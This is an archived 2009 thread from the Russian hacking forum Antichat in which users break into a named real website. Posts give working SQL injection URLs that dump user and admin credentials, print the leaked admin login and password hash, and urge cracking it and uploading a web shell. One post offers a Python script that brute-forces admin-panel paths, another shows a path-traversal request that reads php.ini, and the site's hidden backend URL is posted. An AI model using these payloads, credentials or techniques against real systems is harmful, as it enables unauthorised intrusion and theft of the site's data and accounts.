ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.04.2009, 20:57
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Эм...
Сообщение от mailbrush
Неверный у тебя пароль... Вот и все. Кста, там инъекция есть...
http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_pa ssword)+from+phpbb_users++limit+1,1
брути!
Челу вроде как сайт нужен, а не форум... 
Код:
http://www.so-znanie.com/index.php?id=-8+union+select+1,2,concat_ws(0x3a,id,login,password)+from+admins--+
Код:
1:admin:5870dc3ee770e65bb1a4a267f7c4fc6e
И в расшифрованом виде:
Так что правильный у него пасс...
Последний раз редактировалось -m0rgan-; 04.04.2009 в 21:02..
|
|
|
04.04.2009, 21:02
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
Код:
1:admin:5870dc3ee770e65bb1a4a267f7c4fc6e
И в расшифрованом виде:
Если честно , я спрашивал как заити под админам
Последний раз редактировалось Saiga; 04.04.2009 в 21:06..
|
|
|
|
04.04.2009, 21:17
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Мне кажется что админка там заныкана и находится по адресу типа /admin/blablabla.php и на папку /admin/ стоит запрет чтения...
Воспользуйся брутером местоположения админки.
|
|
|
|
04.04.2009, 21:20
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
Код:
error_log - 403 Forbidden
robots.txt - 200 OK
test.htm - 200 OK
test.php - 200 OK
db/ - 200 OK
stats/ - 200 OK
config.php - 200 OK
ini/ - 200 OK
cpanel/ - 200 OK
~root/ - 403 Forbidden
cgi-bin/ - 403 Forbidden
img/ - 200 OK
images/ - 200 OK
forum/ - 200 OK
article/ - 200 OK
articles/ - 200 OK
cgi-sys/ - 403 Forbidden
css/ - 200 OK
gallery/ - 200 OK
js/ - 200 OK
чето хз где там админка, цпанель с sql на сайте никак не связана, а больше ниче не нашел...
Так что брутьте пхпбб хэш и лейте шелл  |
|
|
|
04.04.2009, 21:21
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
2 -m0rgan-
спасибо . А что за брут по админке ?
|
|
|
|
04.04.2009, 21:24
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Сообщение от Saiga
2 -m0rgan-
спасибо . А что за брут по админке ?
Код:
#/usr/bin/python
import sys, os, time, httplib
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
if len(sys.argv) != 2:
print "\n|-------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "| Help: admin-find.py -h |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
for arg in sys.argv:
if arg == '-h':
print "\n|-----------------------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "| Usage: admin-find.py www.site.com |"
print "| Example: admin-find.py site.com |"
print "|-------------------------------------------------------------------------------|\n"
sys.exit(1)
site = sys.argv[1].replace("http://","").rsplit("/",1)[0]
site = site.lower()
admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','w ebadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.htm l','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','m odelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpane l.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php', 'admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php ','memberadmin.php','administratorlogin.php']
print "\n|-------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "[+] Target:",site
print "[+] Checking paths..."
print
try:
for admin in admin_path:
admin = admin.replace("\n","")
admin = "/" + admin
connection = httplib.HTTPConnection(site)
connection.request("GET",admin)
response = connection.getresponse()
print "%s %s %s" % (admin, response.status, response.reason)
except(KeyboardInterrupt,SystemExit):
raise
except:
pass
|
|
|
|
04.04.2009, 21:54
|
|
Новичок
Регистрация: 16.03.2009
Сообщений: 24
Провел на форуме:
62919
Репутация:
2
|
|
Сообщение от -m0rgan-
Лишняя запятая.
ошибка в самом php.ini чтоли ?
|
|
|
|
04.04.2009, 22:02
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Эм...а куда ты его подключаешь?
дай код!
Последний раз редактировалось -m0rgan-; 04.04.2009 в 22:04..
|
|
|
|
04.04.2009, 22:23
|
|
Новичок
Регистрация: 16.03.2009
Сообщений: 24
Провел на форуме:
62919
Репутация:
2
|
|
в принципе я делаю только вот такой запрос
http://www.sitename.com/scriptname.php?param=../../../../../../../../../../../usr/local/lib/php.ini%00
|
|
|
|
04.04.2009, 22:42
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от Saiga
2 -m0rgan-
спасибо . А что за брут по админке ?
Код:
http://so-znanie.com/backend/main.php
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
